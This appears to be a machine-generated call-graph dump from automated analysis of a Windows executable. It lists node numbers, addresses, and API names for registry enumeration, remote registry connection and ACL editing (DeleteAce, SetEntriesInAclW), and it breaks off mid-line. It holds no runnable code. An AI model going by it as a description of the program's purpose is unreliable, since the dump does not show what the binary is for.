41838->41839 41882 7ff69705bc40 245 API calls 41839->41882 41840 7ff69705b779 41877 7ff69705bb51 ISource 41840->41877 42207 7ff69705a350 41840->42207 41843 7ff69705b7ad 41846 7ff6970721d4 std::_Facet_Register 5 API calls 41843->41846 41843->41877 41844 7ff69705bc26 41848 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41844->41848 41845 7ff697072180 _handle_errorf 8 API calls 41847 7ff69705bc06 41845->41847 41849 7ff69705b7c9 memcpy_s 41846->41849 41847->41726 41850 7ff69705bc2c 41848->41850 41851 7ff69705b7eb RegEnumKeyExW 41849->41851 41852 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41850->41852 41869 7ff69705b81f ISource 41851->41869 41853 7ff69705bc32 41852->41853 41860 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41853->41860 41854 7ff69705b920 41855 7ff69705b9df 41854->41855 41856 7ff69705b930 41854->41856 41859 7ff69705b9eb RegCloseKey 41855->41859 41881 7ff69705b9f1 ISource 41855->41881 41857 7ff69705b93c 41856->41857 41858 7ff69705b935 RegCloseKey 41856->41858 41862 7ff69705b971 ISource 41857->41862 41870 7ff69705bc21 41857->41870 41858->41857 41859->41881 41864 7ff69705bc38 41860->41864 41861 7ff697043f80 35 API calls 41861->41869 42377 7ff697039720 31 API calls 2 library calls 41862->42377 41863 7ff69705bb05 41865 7ff69705bb3c ISource 41863->41865 41863->41870 42391 7ff697043e30 33 API calls 41864->42391 42389 7ff697039720 31 API calls 2 library calls 41865->42389 41869->41850 41869->41854 41869->41861 41878 7ff69705b8e6 RegEnumKeyExW 41869->41878 42376 7ff697040360 35 API calls 3 library calls 41869->42376 41873 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41870->41873 41871 7ff69705b986 41871->41844 41876 7ff69705b9be ISource 41871->41876 41873->41844 41876->41845 41877->41844 41877->41876 42390 7ff697039720 31 API calls 2 library calls 41877->42390 41878->41869 41879 7ff69703ac70 35 API calls 41879->41881 41880 7ff69705b710 255 API calls 41880->41881 41881->41853 41881->41863 41881->41864 41881->41879 41881->41880 42378 7ff69703aa20 41881->42378 41882->41840 41883->41702 41884->41722 41886 7ff69705bd43 IsValidSid 41885->41886 41887 7ff69705bd59 41885->41887 41886->41887 41888 7ff69705bd4d 41886->41888 41890 7ff69705bd7c IsValidSid 41887->41890 41891 7ff69705bd92 41887->41891 42468 7ff69706ec20 IsValidSid GetLengthSid CopySid __std_exception_destroy 41888->42468 41890->41891 41892 7ff69705bd86 41890->41892 41894 7ff697039520 35 API calls 41891->41894 41947 7ff69705c031 ISource 41891->41947 42469 7ff69706ec20 IsValidSid GetLengthSid CopySid __std_exception_destroy 41892->42469 41896 7ff69705bdbf 41894->41896 41895 7ff697039520 35 API calls 41897 7ff69705c0e9 41895->41897 41898 7ff697039520 35 API calls 41896->41898 42448 7ff697054440 41897->42448 41900 7ff69705bdd3 41898->41900 41904 7ff69704c460 8 API calls 41900->41904 41901 7ff69705e472 42507 7ff697043e30 33 API calls 41901->42507 41902 7ff69705e45a 42506 7ff697043e30 33 API calls 41902->42506 41909 7ff69705be2b 41904->41909 41907 7ff69703aa20 35 API calls 41912 7ff69705c36f 41907->41912 41908 7ff69705e478 41915 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41908->41915 41920 7ff69704c460 8 API calls 41909->41920 41910 7ff69703aa20 35 API calls 41913 7ff69705c14b 41910->41913 41911 7ff69705e460 41917 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41911->41917 41914 7ff69703ac70 35 API calls 41912->41914 41916 7ff69703ac70 35 API calls 41913->41916 41918 7ff69705c38b 41914->41918 41919 7ff69705e47e 41915->41919 41921 7ff69705c165 41916->41921 41922 7ff69705e466 41917->41922 41923 7ff697043f80 35 API calls 41918->41923 41927 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41919->41927 41924 7ff69705be7a 41920->41924 41925 7ff697043f80 35 API calls 41921->41925 41926 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41922->41926 41962 7ff69705c3eb ISource 41923->41962 41928 7ff697070c18 13 API calls 41924->41928 41938 7ff69705c1c2 ISource __std_exception_destroy 41925->41938 41929 7ff69705e46c 41926->41929 41930 7ff69705e484 41927->41930 41931 7ff69705be84 41928->41931 41932 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41929->41932 41933 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41930->41933 42470 7ff697045cf0 70 API calls 41931->42470 41932->41901 41934 7ff69705e48a 41933->41934 42508 7ff697043e30 33 API calls 41934->42508 41937 7ff69705e490 41940 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41937->41940 41938->41911 41938->41922 41938->41929 42473 7ff697066970 31 API calls 3 library calls 41938->42473 41943 7ff69705e496 41940->41943 41941 7ff69705c2de 42474 7ff697066970 31 API calls 3 library calls 41941->42474 41942 7ff69705beb8 41942->41947 41954 7ff69705beeb ISource __std_exception_destroy 41942->41954 41948 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41943->41948 41945 7ff69705c2e8 41945->41901 41945->41907 41949 7ff69705c00f ISource 41945->41949 42190 7ff69705e424 41945->42190 41946 7ff69705e44e 41951 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41946->41951 41947->41895 41947->41946 41950 7ff69705e454 41947->41950 41952 7ff69705e49c 41948->41952 41955 7ff697072180 _handle_errorf 8 API calls 41949->41955 41953 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41950->41953 41951->41950 41958 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41952->41958 41953->41902 41954->41946 41954->41950 42471 7ff697066970 31 API calls 3 library calls 41954->42471 41957 7ff69705e404 41955->41957 41957->41726 41964 7ff69705e4a2 41958->41964 41959 7ff69705bfcc 42472 7ff697066970 31 API calls 3 library calls 41959->42472 41960 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41961 7ff69705e42a 41960->41961 41968 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41961->41968 41962->41908 41962->41919 41962->41930 41963 7ff697039520 35 API calls 41962->41963 41966 7ff69705c803 41963->41966 41969 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41964->41969 41972 7ff69705c83b 41966->41972 41973 7ff69705cd69 41966->41973 41967 7ff69705bfd6 41967->41949 42053 7ff69705e448 41967->42053 41970 7ff69705e430 41968->41970 41971 7ff69705e4a8 41969->41971 41977 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41970->41977 41976 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41971->41976 41974 7ff69705cadc 41972->41974 41975 7ff69705c84f 41972->41975 41983 7ff697039520 35 API calls 41973->41983 42092 7ff69705cdc2 ISource __std_exception_destroy 41973->42092 42477 7ff69704bf60 45 API calls 4 library calls 41974->42477 42475 7ff69704bf60 45 API calls 4 library calls 41975->42475 41980 7ff69705e4ae 41976->41980 41981 7ff69705e436 41977->41981 41978 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41978->41946 42509 7ff697043e30 33 API calls 41980->42509 41989 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41981->41989 41986 7ff69705cda9 41983->41986 41984 7ff69705c854 41984->41934 42001 7ff69703aa20 35 API calls 41984->42001 41985 7ff69705cae1 41985->41980 42004 7ff69703aa20 35 API calls 41985->42004 42479 7ff6970450c0 73 API calls 3 library calls 41986->42479 41988 7ff69705cf6c GetAclInformation 41993 7ff69705cf8b GetLastError 41988->41993 41994 7ff69705cf9f 41988->41994 41996 7ff69705e43c 41989->41996 41990 7ff69705d272 41997 7ff69705d2ae 41990->41997 42005 7ff69705d2b8 GetAclInformation 41990->42005 41991 7ff69705d0de 41991->41990 41998 7ff69705d110 GetAclInformation 41991->41998 42003 7ff69705d1a2 41991->42003 42000 7ff69705e354 LocalFree LocalFree 41993->42000 42009 7ff69705cfc0 GetAce 41994->42009 42030 7ff69705cfdf DeleteAce 41994->42030 42040 7ff69705ce3c 41994->42040 41995 7ff69705e4b4 42010 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41995->42010 42014 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 41996->42014 42002 7ff69705d382 41997->42002 42013 7ff69705d38a GetAclInformation 41997->42013 42006 7ff69705d12c GetLastError 41998->42006 42007 7ff69705d140 41998->42007 41999 7ff69705cdba 42012 7ff697039520 35 API calls 41999->42012 41999->42092 42008 7ff69705e377 __std_exception_destroy 42000->42008 42011 7ff69705c8a6 42001->42011 42035 7ff69705d44c 42002->42035 42482 7ff697069d50 69 API calls 4 library calls 42002->42482 42003->41990 42015 7ff69705d1d3 GetAclInformation 42003->42015 42017 7ff69705cb33 42004->42017 42018 7ff69705d2eb 42005->42018 42019 7ff69705d2d7 GetLastError 42005->42019 42006->42000 42007->42003 42020 7ff69705d160 GetAce 42007->42020 42037 7ff69705d183 DeleteAce 42007->42037 42504 7ff697066970 31 API calls 3 library calls 42008->42504 42009->41993 42009->41994 42021 7ff69705e4ba 42010->42021 42022 7ff69703ac70 35 API calls 42011->42022 42012->42092 42023 7ff69705d3bc 42013->42023 42024 7ff69705d3a8 GetLastError 42013->42024 42025 7ff69705e442 42014->42025 42026 7ff69705d1ef GetLastError 42015->42026 42077 7ff69705d203 42015->42077 42016 7ff69705d02b GetAclInformation 42027 7ff69705d047 GetLastError 42016->42027 42069 7ff69705d06f 42016->42069 42028 7ff69703ac70 35 API calls 42017->42028 42018->41997 42029 7ff69705d300 GetAce 42018->42029 42049 7ff69705d32b DeleteAce 42018->42049 42019->42000 42020->41993 42020->42007 42039 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42021->42039 42031 7ff69705c8c0 42022->42031 42023->42002 42044 7ff69705d3d0 GetAce 42023->42044 42061 7ff69705d3fb DeleteAce 42023->42061 42024->42000 42042 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42025->42042 42026->42000 42027->42000 42033 7ff69705cb4d 42028->42033 42029->41993 42029->42018 42030->41994 42038 7ff69705d05b GetLastError 42030->42038 42476 7ff69704a1f0 33 API calls 42031->42476 42478 7ff69704a1f0 33 API calls 42033->42478 42034 7ff69705d47e 42036 7ff69705d59d __std_exception_destroy 42034->42036 42050 7ff69705d4b2 42034->42050 42107 7ff69705c937 ISource __std_exception_destroy 42034->42107 42484 7ff697069830 50 API calls 2 library calls 42034->42484 42035->42034 42035->42107 42483 7ff697069d50 69 API calls 4 library calls 42035->42483 42058 7ff69705d5f7 42036->42058 42097 7ff69705d7ac __std_exception_destroy 42036->42097 42489 7ff697068360 156 API calls 4 library calls 42036->42489 42037->42007 42037->42038 42038->42000 42051 7ff69705e4c0 42039->42051 42040->41991 42040->42016 42042->42053 42043 7ff69705e397 42505 7ff697066970 31 API calls 3 library calls 42043->42505 42044->41993 42044->42023 42045 7ff69705d220 GetAce 42045->41993 42045->42077 42046 7ff69705d090 GetAce 42046->41993 42046->42069 42049->42018 42049->42038 42050->42036 42065 7ff69705d4e3 42050->42065 42050->42107 42485 7ff697069830 50 API calls 2 library calls 42050->42485 42067 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42051->42067 42053->41978 42058->42097 42058->42107 42118 7ff69705d628 42058->42118 42490 7ff697068360 156 API calls 4 library calls 42058->42490 42060 7ff69705e3a1 42060->41949 42060->42025 42061->42023 42061->42038 42065->42036 42065->42107 42486 7ff697069b10 13 API calls __std_exception_destroy 42065->42486 42071 7ff69705e4c6 42067->42071 42068 7ff69705d942 SetEntriesInAclW 42072 7ff69705d964 42068->42072 42073 7ff69705dc10 SetEntriesInAclW 42068->42073 42069->41991 42069->42046 42075 7ff69705d0c3 DeleteAce 42069->42075 42480 7ff6970639c0 13 API calls _handle_errorf 42069->42480 42083 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42071->42083 42072->42107 42493 7ff69704bf60 45 API calls 4 library calls 42072->42493 42078 7ff69705dc36 42073->42078 42079 7ff69705dee2 42073->42079 42074 7ff69705d253 DeleteAce 42074->42038 42074->42077 42075->42038 42075->42069 42077->41990 42077->42045 42077->42074 42481 7ff6970639c0 13 API calls _handle_errorf 42077->42481 42078->42107 42495 7ff69704bf60 45 API calls 4 library calls 42078->42495 42080 7ff69705dfa4 42079->42080 42081 7ff69705def1 42079->42081 42094 7ff69705dfd8 42080->42094 42095 7ff69705dfc3 IsValidSid 42080->42095 42148 7ff69705df9f 42080->42148 42086 7ff69705df1a 42081->42086 42087 7ff69705df05 IsValidSid 42081->42087 42089 7ff69705e4cc 42083->42089 42101 7ff69705df4b 42086->42101 42102 7ff69705df36 IsValidSid 42086->42102 42087->42086 42093 7ff69705df12 42087->42093 42088 7ff69705d527 42088->42107 42110 7ff69705d541 IsValidSid 42088->42110 42124 7ff69705d554 __std_exception_destroy 42088->42124 42103 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42089->42103 42090 7ff69705d739 42099 7ff69705d74c IsValidSid 42090->42099 42109 7ff69705d75f __std_exception_destroy 42090->42109 42091 7ff69705d97e 42098 7ff69705e4d2 42091->42098 42119 7ff69703aa20 35 API calls 42091->42119 42092->41961 42092->41988 42092->41991 42092->42040 42497 7ff69706ec20 IsValidSid GetLengthSid CopySid __std_exception_destroy 42093->42497 42115 7ff69705e009 42094->42115 42116 7ff69705dff4 IsValidSid 42094->42116 42095->42094 42105 7ff69705dfd0 42095->42105 42096 7ff69705dc50 42106 7ff69705e4f0 42096->42106 42126 7ff69703aa20 35 API calls 42096->42126 42097->42068 42097->42107 42510 7ff697043e30 33 API calls 42098->42510 42108 7ff69705d756 42099->42108 42099->42109 42125 7ff697039520 35 API calls 42101->42125 42102->42101 42111 7ff69705df43 42102->42111 42103->42098 42500 7ff69706ec20 IsValidSid GetLengthSid CopySid __std_exception_destroy 42105->42500 42511 7ff697043e30 33 API calls 42106->42511 42107->41937 42107->41943 42107->41952 42107->41964 42107->41971 42107->41995 42107->42000 42107->42021 42107->42051 42107->42071 42107->42089 42491 7ff69706ec20 IsValidSid GetLengthSid CopySid __std_exception_destroy 42108->42491 42109->42097 42121 7ff69705d799 IsValidSid 42109->42121 42122 7ff69705d54b 42110->42122 42110->42124 42498 7ff69706ec20 IsValidSid GetLengthSid CopySid __std_exception_destroy 42111->42498 42138 7ff697039520 35 API calls 42115->42138 42116->42115 42128 7ff69705e001 42116->42128 42118->42090 42118->42097 42118->42107 42141 7ff697069200 118 API calls 42118->42141 42130 7ff69705d9d2 42119->42130 42121->42097 42131 7ff69705d7a3 42121->42131 42487 7ff69706ec20 IsValidSid GetLengthSid CopySid __std_exception_destroy 42122->42487 42124->42036 42135 7ff69705d58a IsValidSid 42124->42135 42134 7ff69705df74 42125->42134 42136 7ff69705dca4 42126->42136 42501 7ff69706ec20 IsValidSid GetLengthSid CopySid __std_exception_destroy 42128->42501 42129 7ff69705e09e 42139 7ff69705e50e 42129->42139 42155 7ff69703aa20 35 API calls 42129->42155 42140 7ff69703ac70 35 API calls 42130->42140 42492 7ff69706ec20 IsValidSid GetLengthSid CopySid __std_exception_destroy 42131->42492 42499 7ff697068010 42 API calls 4 library calls 42134->42499 42135->42036 42145 7ff69705d594 42135->42145 42146 7ff69703ac70 35 API calls 42136->42146 42138->42148 42512 7ff697043e30 33 API calls 42139->42512 42150 7ff69705d9ea 42140->42150 42141->42118 42488 7ff69706ec20 IsValidSid GetLengthSid CopySid __std_exception_destroy 42145->42488 42152 7ff69705dcbc 42146->42152 42148->42107 42502 7ff69704bf60 45 API calls 4 library calls 42148->42502 42494 7ff69704a1f0 33 API calls 42150->42494 42496 7ff69704a1f0 33 API calls 42152->42496 42159 7ff69705e0f0 42155->42159 42165 7ff69703ac70 35 API calls 42159->42165 42170 7ff69705e10a 42165->42170 42503 7ff69704a1f0 33 API calls 42170->42503 42190->41960 42191->41730 42192->41727 42193->41769 42194->41793 42195->41800 42196->41729 42197->41747 42198->41789 42199->41791 42200->41794 42201->41697 42202->41701 42203->41706 42204->41721 42205->41731 42206->41780 42208 7ff69705a42e 42207->42208 42392 7ff69704c460 42208->42392 42215 7ff69705a5e9 42216 7ff697043f80 35 API calls 42215->42216 42245 7ff69705a591 ISource 42215->42245 42216->42245 42217 7ff69705a48d 42220 7ff69705b512 42217->42220 42223 7ff697043f80 35 API calls 42217->42223 42218 7ff69705a64c 42221 7ff697043f80 35 API calls 42218->42221 42219 7ff69705a664 42222 7ff697043f80 35 API calls 42219->42222 42428 7ff697044230 31 API calls 2 library calls 42220->42428 42242 7ff69705a65f ISource 42221->42242 42225 7ff69705a68e ISource 42222->42225 42237 7ff69705a4fa ISource 42223->42237 42227 7ff69705b703 42225->42227 42230 7ff69705b6fe 42225->42230 42232 7ff697043f80 35 API calls 42225->42232 42226 7ff69705b6b4 42429 7ff697044230 31 API calls 2 library calls 42226->42429 42411 7ff697039910 42227->42411 42229 7ff697070c18 13 API calls 42262 7ff69705a788 42229->42262 42234 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42230->42234 42236 7ff69705a72c 42232->42236 42233 7ff69705b6be 42430 7ff697044230 31 API calls 2 library calls 42233->42430 42234->42227 42235 7ff69705b709 42241 7ff697039520 35 API calls 42235->42241 42236->42230 42236->42242 42237->42227 42237->42230 42239 7ff697043f80 35 API calls 42237->42239 42239->42245 42240 7ff69705b6c8 42431 7ff697044230 31 API calls 2 library calls 42240->42431 42244 7ff69705b76e 42241->42244 42242->42229 42375 7ff69705bc40 245 API calls 42244->42375 42245->42218 42245->42219 42245->42230 42246 7ff69705b6d2 42247 7ff697072180 _handle_errorf 8 API calls 42246->42247 42249 7ff69705b6e3 42247->42249 42248 7ff69705b779 42254 7ff69705a350 250 API calls 42248->42254 42305 7ff69705bb51 ISource 42248->42305 42249->41843 42250 7ff69705a840 42253 7ff697070c18 13 API calls 42250->42253 42269 7ff69705aa87 42250->42269 42251 7ff69703c870 70 API calls 42251->42262 42252 7ff697039720 31 API calls 42297 7ff69705b986 42252->42297 42302 7ff69705a8a5 42253->42302 42255 7ff69705b7ad 42254->42255 42258 7ff6970721d4 std::_Facet_Register 5 API calls 42255->42258 42255->42305 42256 7ff69705bc26 42260 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42256->42260 42257 7ff697072180 _handle_errorf 8 API calls 42259 7ff69705bc06 42257->42259 42261 7ff69705b7c9 memcpy_s 42258->42261 42259->41843 42263 7ff69705bc2c 42260->42263 42267 7ff69705b7eb RegEnumKeyExW 42261->42267 42262->42250 42262->42251 42270 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42263->42270 42264 7ff69705ab9b 42268 7ff697070c18 13 API calls 42264->42268 42265 7ff69705ab79 42266 7ff697043f80 35 API calls 42265->42266 42368 7ff69705ab8f Concurrency::details::SchedulerBase::GetBitSet SimpleUString::operator= 42266->42368 42294 7ff69705b81f ISource 42267->42294 42320 7ff69705aba2 42268->42320 42269->42264 42269->42265 42271 7ff69705bc32 42270->42271 42282 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42271->42282 42272 7ff69705b920 42275 7ff69705b9df 42272->42275 42276 7ff69705b930 42272->42276 42273 7ff69705a960 42273->42269 42279 7ff697070c18 13 API calls 42273->42279 42274 7ff69703c870 70 API calls 42274->42302 42277 7ff69705b9eb RegCloseKey 42275->42277 42322 7ff69705b9f1 ISource 42275->42322 42280 7ff69705b93c 42276->42280 42281 7ff69705b935 RegCloseKey 42276->42281 42277->42322 42331 7ff69705a9c5 42279->42331 42286 7ff69705b971 ISource 42280->42286 42296 7ff69705bc21 42280->42296 42281->42280 42287 7ff69705bc38 42282->42287 42283 7ff697043f80 35 API calls 42283->42294 42284 7ff69705bb05 42290 7ff69705bb3c ISource 42284->42290 42284->42296 42285 7ff69705b488 42418 7ff697039420 31 API calls 2 library calls 42285->42418 42291 7ff697039720 31 API calls 42286->42291 42292 7ff697043e30 33 API calls 42287->42292 42289 7ff69705b4a0 42312 7ff69705b4eb 42289->42312 42420 7ff697039cb0 35 API calls 42289->42420 42293 7ff697039720 31 API calls 42290->42293 42291->42297 42298 7ff69705bc3e 42292->42298 42293->42305 42294->42263 42294->42272 42294->42283 42299 7ff697040360 35 API calls 42294->42299 42306 7ff69705b8e6 RegEnumKeyExW 42294->42306 42295 7ff69705b497 42419 7ff697044230 31 API calls 2 library calls 42295->42419 42303 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42296->42303 42297->42256 42304 7ff69705b9be ISource 42297->42304 42299->42294 42300 7ff69703aa20 35 API calls 42300->42322 42302->42273 42302->42274 42303->42256 42304->42257 42305->42252 42305->42256 42305->42304 42306->42294 42308 7ff69705ac60 42310 7ff697070c18 13 API calls 42308->42310 42327 7ff69705aea7 42308->42327 42309 7ff69705b4d5 42421 7ff697044230 31 API calls 2 library calls 42309->42421 42342 7ff69705acc5 42310->42342 42311 7ff69703ac70 35 API calls 42311->42322 42312->42220 42313 7ff69705b54c 42312->42313 42314 7ff69705b526 RegConnectRegistryW 42312->42314 42319 7ff69705b55f RegOpenKeyExW 42313->42319 42314->42220 42314->42313 42315 7ff69705b710 250 API calls 42315->42322 42316 7ff69703c870 70 API calls 42316->42331 42318 7ff69703c870 70 API calls 42318->42320 42321 7ff69705b58b 42319->42321 42320->42308 42320->42318 42326 7ff69705b676 42321->42326 42330 7ff69705b5a7 RegCreateKeyExW 42321->42330 42322->42271 42322->42284 42322->42287 42322->42300 42322->42311 42322->42315 42323 7ff69705afbb 42325 7ff697070c18 13 API calls 42323->42325 42324 7ff69705af99 42328 7ff697043f80 35 API calls 42324->42328 42351 7ff69705afc2 42325->42351 42326->42220 42329 7ff69705b68e RegCloseKey 42326->42329 42327->42323 42327->42324 42328->42368 42329->42220 42333 7ff69705b5e6 42330->42333 42334 7ff69705b652 42330->42334 42331->42269 42331->42316 42332 7ff69703c870 70 API calls 42332->42342 42422 7ff697039cb0 35 API calls 42333->42422 42334->42326 42339 7ff69705b65f RegCloseKey 42334->42339 42335 7ff69705ad80 42335->42327 42337 7ff697070c18 13 API calls 42335->42337 42360 7ff69705ade5 42337->42360 42338 7ff69705b5f9 42423 7ff697039d20 35 API calls 42338->42423 42339->42326 42341 7ff69705b60d 42424 7ff6970394c0 35 API calls 42341->42424 42342->42332 42342->42335 42344 7ff69705b080 42346 7ff697070c18 13 API calls 42344->42346 42350 7ff69705b2c0 Concurrency::details::SchedulerBase::GetBitSet 42344->42350 42345 7ff69705b620 42425 7ff697044230 31 API calls 2 library calls 42345->42425 42369 7ff69705b0e5 42346->42369 42348 7ff69703c870 70 API calls 42348->42351 42349 7ff69705b637 42426 7ff697044230 31 API calls 2 library calls 42349->42426 42353 7ff697070c18 13 API calls 42350->42353 42350->42368 42351->42344 42351->42348 42355 7ff69705b386 42353->42355 42354 7ff69705b641 42427 7ff697044230 31 API calls 2 library calls 42354->42427 42414 7ff697039b00 70 API calls 42355->42414 42358 7ff69703c870 70 API calls 42358->42360 42359 7ff69705b3aa 42363 7ff697070c18 13 API calls 42359->42363 42359->42368 42360->42327 42360->42358 42361 7ff69705b1a0 42361->42350 42364 7ff697070c18 13 API calls 42361->42364 42362 7ff69703c870 70 API calls 42362->42369 42365 7ff69705b3b5 42363->42365 42374 7ff69705b205 42364->42374 42415 7ff697039b00 70 API calls 42365->42415 42367 7ff69705b3d9 42367->42368 42370 7ff697070c18 13 API calls 42367->42370 42368->42220 42368->42289 42417 7ff697039d90 35 API calls 42368->42417 42369->42361 42369->42362 42371 7ff69705b3e4 42370->42371 42416 7ff697039b00 70 API calls 42371->42416 42373 7ff69703c870 70 API calls 42373->42374 42374->42350 42374->42373 42375->42248 42376->41869 42377->41871 42380 7ff69703aa72 42378->42380 42381 7ff69703aad9 ctype 42378->42381 42379 7ff69703ab53 Concurrency::cancel_current_task 42380->42379 42382 7ff69703aae7 42380->42382 42383 7ff69703aa87 42380->42383 42381->41881 42382->42381 42386 7ff6970721d4 std::_Facet_Register 5 API calls 42382->42386 42383->42379 42384 7ff6970721d4 std::_Facet_Register 5 API calls 42383->42384 42385 7ff69703aad4 42384->42385 42385->42381 42387 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42385->42387 42386->42381 42388 7ff69703ab52 42387->42388 42388->42379 42389->41877 42390->41871 42393 7ff69704c48e ctype 42392->42393 42432 7ff69704c5b0 42393->42432 42395 7ff69704c519 ISource ctype 42396 7ff697072180 _handle_errorf 8 API calls 42395->42396 42397 7ff69704c594 42396->42397 42398 7ff697070c18 42397->42398 42436 7ff69707125c 42398->42436 42400 7ff697070c3a 42406 7ff697070c5d __std_exception_destroy ctype 42400->42406 42444 7ff697070e14 5 API calls std::_Facet_Register 42400->42444 42402 7ff697070c52 42445 7ff697070e44 EncodePointer std::locale::_Setgloballocale 42402->42445 42405 7ff69705a44a 42407 7ff6970644d0 42405->42407 42406->42406 42440 7ff6970712d4 42406->42440 42408 7ff6970644ff 42407->42408 42409 7ff69703c870 70 API calls 42408->42409 42410 7ff69705a45d 42408->42410 42409->42408 42410->42215 42410->42217 42447 7ff697071034 33 API calls Concurrency::cancel_current_task 42411->42447 42414->42359 42415->42367 42416->42368 42417->42285 42418->42295 42419->42289 42420->42309 42421->42312 42422->42338 42423->42341 42424->42345 42425->42349 42426->42354 42427->42220 42428->42226 42429->42233 42430->42240 42431->42246 42433 7ff69704c603 ISource ctype 42432->42433 42434 7ff697072180 _handle_errorf 8 API calls 42433->42434 42435 7ff69704c6f2 42434->42435 42435->42395 42437 7ff69707126b 42436->42437 42438 7ff697071270 42436->42438 42446 7ff69707f2d4 6 API calls std::_Lockit::_Lockit 42437->42446 42438->42400 42441 7ff6970712e8 42440->42441 42442 7ff6970712df LeaveCriticalSection 42440->42442 42441->42405 42444->42402 42445->42406 42449 7ff697070c18 13 API calls 42448->42449 42450 7ff697054487 42449->42450 42462 7ff6970544da ISource 42450->42462 42513 7ff69703c870 70 API calls 4 library calls 42450->42513 42452 7ff6970546df 42454 7ff6970547fd 42452->42454 42465 7ff697054716 ISource 42452->42465 42453 7ff697070c18 13 API calls 42453->42462 42457 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42454->42457 42455 7ff697072180 _handle_errorf 8 API calls 42456 7ff69705473c 42455->42456 42456->41902 42456->41910 42456->41945 42458 7ff697054803 42457->42458 42459 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42458->42459 42461 7ff697054809 42459->42461 42462->42452 42462->42453 42462->42458 42464 7ff69705475d ISource 42462->42464 42514 7ff69703c870 70 API calls 4 library calls 42462->42514 42515 7ff697049ec0 35 API calls 4 library calls 42462->42515 42464->42458 42464->42465 42466 7ff6970547f8 42464->42466 42465->42455 42467 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42466->42467 42467->42454 42468->41887 42469->41891 42470->41942 42471->41959 42472->41967 42473->41941 42474->41945 42475->41984 42477->41985 42479->41999 42480->42069 42481->42077 42482->42035 42483->42034 42484->42050 42485->42065 42486->42088 42487->42124 42488->42036 42489->42058 42490->42118 42491->42109 42492->42097 42493->42091 42495->42096 42497->42086 42498->42101 42499->42148 42500->42094 42501->42115 42502->42129 42504->42043 42505->42060 42513->42450 42514->42462 42515->42462 42516 7ff697066b2a 42517 7ff697066b45 42516->42517 42518 7ff697066b33 42516->42518 42519 7ff697066b59 42517->42519 42520 7ff697066cbf 42517->42520 42523 7ff697043f80 35 API calls 42518->42523 42524 7ff697043f80 35 API calls 42519->42524 42521 7ff697066cc5 42520->42521 42522 7ff697066d0f 42520->42522 42525 7ff697066cd2 CreateFileW 42521->42525 42526 7ff697066ccf 42521->42526 42527 7ff697066d19 42522->42527 42528 7ff697066e55 42522->42528 42523->42517 42529 7ff697066b83 42524->42529 42532 7ff697066e36 42525->42532 42533 7ff697066d0a 42525->42533 42526->42525 42534 7ff69705a350 259 API calls 42527->42534 42531 7ff697066e5b 42528->42531 42528->42532 42530 7ff697043f80 35 API calls 42529->42530 42535 7ff697066baf 42530->42535 42537 7ff697039520 35 API calls 42531->42537 42536 7ff697066e43 RegCloseKey 42532->42536 42542 7ff697066d3e 42532->42542 42538 7ff697066d57 GetKernelObjectSecurity 42533->42538 42539 7ff697066d34 42534->42539 42589 7ff6970442a0 58 API calls 3 library calls 42535->42589 42536->42542 42544 7ff697066e67 42537->42544 42541 7ff697066d7e 42538->42541 42552 7ff697066e11 __std_exception_destroy 42538->42552 42539->42532 42539->42538 42539->42542 42547 7ff697066d8e GetLastError 42541->42547 42548 7ff697066df1 GetKernelObjectSecurity 42541->42548 42542->42544 42546 7ff697066ef1 GetNamedSecurityInfoW 42542->42546 42543 7ff697066e2d CloseHandle 42543->42532 42545 7ff697066fdc MakeAbsoluteSD GetLastError 42544->42545 42585 7ff697066da1 ISource 42544->42585 42549 7ff697067032 GetLastError 42545->42549 42567 7ff69706708e __std_exception_destroy 42545->42567 42546->42544 42546->42585 42547->42585 42587 7ff697066dce ISource 42547->42587 42548->42552 42549->42585 42549->42587 42550 7ff697067445 42556 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42550->42556 42551 7ff697066bc0 ISource 42551->42520 42551->42550 42553 7ff697066c5c 42551->42553 42554 7ff69706744b 42551->42554 42552->42532 42552->42543 42555 7ff697066c93 ISource 42553->42555 42557 7ff69706743f 42553->42557 42560 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42554->42560 42555->42587 42556->42554 42559 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42557->42559 42558 7ff697072180 _handle_errorf 8 API calls 42561 